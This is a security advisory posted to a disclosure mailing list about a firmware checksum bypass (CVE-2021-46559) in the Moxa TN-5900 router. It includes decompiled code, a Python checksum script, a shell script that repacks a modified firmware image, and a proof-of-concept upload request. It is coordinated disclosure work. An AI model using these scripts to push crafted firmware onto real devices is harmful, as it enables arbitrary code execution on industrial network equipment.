[<prev] [next>] [day] [month] [year] [list]
Message-ID: <18257d8c-17f4-10b2-fc91-32c18b904e62@korelogic.com>
Date: Fri, 28 Jan 2022 12:39:34 -0600
From: KoreLogic Disclosures via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org
Subject: [FD] KL-001-2022-001: Moxa TN-5900 Firmware Upgrade Checksum
Validation Vulnerability
KL-001-2022-001: Moxa TN-5900 Firmware Upgrade Checksum Validation Vulnerability
Title: Moxa TN-5900 Firmware Upgrade Checksum Validation Vulnerability
Advisory ID: KL-001-2022-001
Publication Date: 2022.01.28
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2022-001.txt
1. Vulnerability Details
Affected Vendor: Moxa
Affected Product: TN-5900
Affected Version: v3.1 and prior
Platform: Moxa Linux
CWE Classification: CWE-354 Improper Validation of Integrity
Check Value
CVE ID: CVE-2021-46559
2. Vulnerability Description
Moxa TN-5900 v3.1.0 and prior uses an insecure method to
validate firmware updates. A malicious user with access to the
management interface can upload abritrary code in a crafted
firmware image simply by replacing a CRC value in the image
header.
3. Technical Description
Analysis on this vulnerability began when KoreLogic noticed that
the Ssgl2_update_session_now function is immediately called
when the URL /goform/web_fwUpload is given to the management
application. The Ssgl2_update_session_now function will enable
a session after authentication through the user interface.
undefined4 websSecurityHandler(longlong *param_1) {
...
...
if (requestPtr[0x20] != 0) {
...
...
field_1 = strncmp(in_t0,"/init.asp",9);
if (CONCAT44(extraout_v0_hi_07,field_1) != 0) {
field_2 = strncmp(in_t0,"/goform/web_fwUpload",0x14);
if (CONCAT44(extraout_v0_hi_08,field_2) == 0) {
Ssgl2_update_session_now(local_490);
}
lVar3 = Ssgl2_webmultisession_session_verify(local_490,auStack104);
...
}
}
...
...
}
Reviewing the web_fwUpload function showed the code is used to
update the operating firmware of the affected device. Before
the firmware is accepted, it must pass a check. This check is
provided through the Ssys_firmwareCheck function.
void web_fwUpload(longlong *param_1,longlong *param_2) {
...
if (lVar1 == -1) {
FUN_1200222c0(param_1,"../upgrade.asp","Firmware Upgrade Fail! Restart the device.");
...
}
else {
printf("%s() buffer upload datalen = %d\n","web_fwUpload",*(param_1 + 0x39));
...
...
}
else {
puts("Ssys_firmwareCheck");
local_118 = Ssys_firmwareCheck(lVar1,4,*(param_1 + 0x39));
if (-1 < local_118) {
local_118 = Ssys_writeProgram(lVar1);
}
if (local_118 < 0) {
printf("%s() %d firmware check fail ret = %d\n","web_fwUpload",0x7c0,local_118);
...
...
}
...
}
The Ssys_firmwareCheck function checks that the kernel and
file system have an expected length and that the provided
image passes a checksum algorithm.
undefined8 Ssys_firmwareCheck(ulonglong param_1,longlong param_2,ulonglong param_3,ulonglong param_4) {
...
if (param_2 == local_44._4_4_) {
...
if (local_4c._0_4_ == 0x400000) {
if ((uVar4 < 0x1800001) && ((uVar4 & 3) == 0)) {
...
file_check_sum(param_1 + 0x20,local_4c._4_4_ + 0x400000,&local_50);
uVar3 = 0;
if (local_50 != local_3c._0_4_) {
FUN_0010d230("[Error] %s L%d : Firmware checksum error (0x%x), should be 0x%x
\r\n","Ssys_firmwareCheck",0x484,local_50,local_3c._0_4_,extraout_t1_00,extraout_t2_00,extraout_t3_00);
uVar3 = 0xfffffffffffffffc;
}
}
else {
FUN_0010d230("[Error] %s L%d : Rootfs length error (%d), max to %d bytes
\r\n","Ssys_firmwareCheck",0x47a,uVar4,0x1800000,extraout_t1,extraout_t2,extraout_t3);
uVar3 = 0xfffffffffffffffd;
}
}
else {
FUN_0010d230("[Error] %s L%d : Kernel length error (%d), should be %d bytes
\r\n","common.c","Ssys_firmwareCheck",0x474,local_4c._0_4_,0x400000,extraout_t2,extraout_t3);
uVar3 = 0xfffffffffffffffe;
}
}
else {
FUN_0010d230("[Error] %s L%d : Firmware file logo mismatch (0x0x), should be 0x%x
\r\n","Ssys_firmwareCheck",0x46c,local_44._4_4_,param_2,extraout_t1,extraout_t2,extraout_t3);
uVar3 = 0xffffffffffffffff;
}
...
}
The checksum is simple and implemented using the following algorithm:
#!/usr/bin/env python3
import sys
from functools import partial
from binascii import hexlify
with open(sys.argv[1],"rb") as f:
f.seek(0x20)
checksum = int(0)
for dword in iter(partial(f.read,4),b''):
checksum += int(hexlify(dword),16)
print (hex(checksum)[-8:])
A breakpoint was set on the file_check_sum function using GDB
and the valid ROM provided by Moxa was processed. The result
of the checksum process was retrieved.
Breakpoint 14, 0x000000fff6fac3a4 in _init () from target:/tmp/moxa/usr/lib64/libsyscommon.so
(gdb) x/1x 0xfffbf4ce30
0xfffbf4ce30: 0x2f43167a
The bytes 0x2f43167a were found in the ROM image itself inside
of a header containing 0x20 bytes.
$ hexdump -C moxa-tn-5900-series-firmware-v3.1.rom
00000000 00 40 00 00 01 45 b0 00 00 00 00 20 00 00 00 04 |.@...E..... ....|
00000010 2f 43 16 7a 03 01 00 00 14 04 07 11 00 00 00 00 |/C.z............|
The following script was constructed to disassemble and rebuild
a firmware image using the expected format. The script will
create a file /korelogic on the filesystem. The file will be
zero bytes.
#!/bin/sh
IF=$1
OF=$2
dd bs=1 if=$IF of=$IF.header_1 count=$((0x10))
dd bs=1 if=$IF of=$IF.checksum skip=$((0x10)) count=4
dd bs=1 if=$IF of=$IF.header_2 skip=$((0x14)) count=$((0x20-0x14))
dd bs=1 if=$IF of=$IF.kernel skip=$((0x20)) count=$((0x1d9669-0x20))
dd bs=1 if=$IF of=$IF.splitter skip=$((0x1d9669)) count=$((0x400020-0x1d9669))
dd bs=1 if=$IF of=$IF.cramfs skip=$((0x400020))
cramfsswap $IF.cramfs $IF.cramfs.swap
sudo cramfsck -x fs $IF.cramfs.swap
touch fs/korelogic
mkcramfs fs/ $IF.cramfs.modified
cat $IF.header_1 $IF.checksum $IF.header_2 $IF.kernel $IF.splitter $IF.cramfs.modified > $OF
./checksum.py $OF | xxd -r -p > check_value
dd bs=1 conv=notrunc if=check_value of=$OF seek=$((0x10)) count=4
Here is the script running.
$ sudo ./make_moxa_image.sh moxa-tn-5900-series-firmware-v3.1.rom hacked.rom
16+0 records in
16+0 records out
16 bytes copied, 9.967e-05 s, 161 kB/s
4+0 records in
4+0 records out
4 bytes copied, 7.4433e-05 s, 53.7 kB/s
12+0 records in
12+0 records out
12 bytes copied, 0.000118918 s, 101 kB/s
1939017+0 records in
1939017+0 records out
1939017 bytes (1.9 MB, 1.8 MiB) copied, 3.76396 s, 515 kB/s
2255287+0 records in
2255287+0 records out
2255287 bytes (2.3 MB, 2.2 MiB) copied, 4.32499 s, 521 kB/s
21344256+0 records in
21344256+0 records out
21344256 bytes (21 MB, 20 MiB) copied, 40.8949 s, 522 kB/s
Filesystem is big endian, will be converted to little endian.
Filesystem contains 3313 files.
CRC: 0x9b7eefd0
4+0 records in
4+0 records out
4 bytes copied, 7.4433e-05 s, 53.7 kB/s
The hacked.rom image is then processed and the same breakpoint
is hit. The new checksum should be 0x0987aafc. The new checksum
is patched into the hacked.rom image already from the above
script.
$ hexdump -C hacked.rom
00000000 00 40 00 00 01 45 b0 00 00 00 00 20 00 00 00 04 |.@...E..... ....|
00000010 09 87 aa fc 03 01 00 00 14 04 07 11 00 00 00 00 |/C.z............|
GDB output confirms that the checksum is the same result:
Breakpoint 2, 0x000000fff72853a4 in _init () from target:/tmp/moxa/usr/lib64/libsyscommon.so
(gdb) x/1x 0xfffbad34d0
0xfffbad34d0: 0x0987aafc
When processing the hacked.rom image, we receive a new error.
Firmware check failed, error occurs when write kernel to flash. Restart the device.
Comparing the indicated error against the pseudo-c indicates we
have passed the firmware validation checks. This was confirmed
using GDB as well.
void web_fwUpload(longlong *param_1,longlong *param_2) {
...
if (lVar1 == -1) {
...
}
else {
...
else {
puts("Ssys_firmwareCheck");
local_118 = Ssys_firmwareCheck(lVar1,4,*(param_1 + 0x39));
if (-1 < local_118) {
local_118 = Ssys_writeProgram(lVar1);
}
...
}
The error indicating a write exception is expected as we were
not operating on a Moxa device but were instead emulating the
Moxa firmware on a MIPS development board.
4. Mitigation and Remediation Recommendation
The vendor has released a patch which remediates the described
vulnerability. Release notes are available at:
https://www.moxa.com/en/support/product-support/security-advisory/tn-5900-secure-routers-vulnerabilities
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
and Josh Hardin of KoreLogic, Inc.
6. Disclosure Timeline
2021.02.05 - KoreLogic submits vulnerability details to Moxa.
2021.02.08 - Moxa acknowledges receipt and the intention to
investigate.
2021.03.02 - Moxa notifies KoreLogic that a patch for this
vulnerability is expected to be available in June 2021.
2021.04.16 - 45 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2021.06.07 - KoreLogic requests update on the status of the
proposed TN-5900 patch.
2021.06.15 - Moxa informs KoreLogic that the patch is expected to be released in mid-July 2021.
2021.06.23 - 90 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2021.07.25 - Moxa informs KoreLogic that the patch is expected to be released in mid-August 2021.
2021.09.22 - 150 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2021.12.21 - 210 business days have elapsed since KoreLogic reported
this vulnerability to the vendor.
2021.12.27 - Moxa notified KoreLogic that the patch is complete and ready for release..
2021.12.28 - Moxa public acknowledgement.
2022.01.25 - KoreLogic requests CVE from Mitre.
2022.01.28 - KoreLogic public disclosure.
7. Proof of Concept
POST /goform/web_fwUpload HTTP/1.1
Host: 192.168.10.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------11395841764774651092787307532
Content-Length: <HTTP REQUEST SIZE>
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------11395841764774651092787307532
Content-Disposition: form-data; name="binary"; filename="hacked.rom"
Content-Type: text/plain
<HACKED.ROM FIRMWARE IMAGE>
-----------------------------11395841764774651092787307532
Content-Disposition: form-data; name="submit"
submit
-----------------------------11395841764774651092787307532--
HTTP/1.1 200 OK
Server: GoAhead-Webs
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Transfer-Encoding: chunked
<!DOCTYPE html>
<html>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<head>
<title></title>
</head>
<body bgcolor="#E8FFF7" text="#000000" topmargin="10" leftmargin="12" >
<font size="2" face="Arial, Helvetica, sans-serif, Marlett">
<p>Firmware check failed, error occurs when write kernel to flash. Restart the device.</p>
</font></body>
</html>
The contents of this advisory are copyright(c) 2022
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt
Download attachment "signature.asc" of type "application/pgp-signature" (834 bytes)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists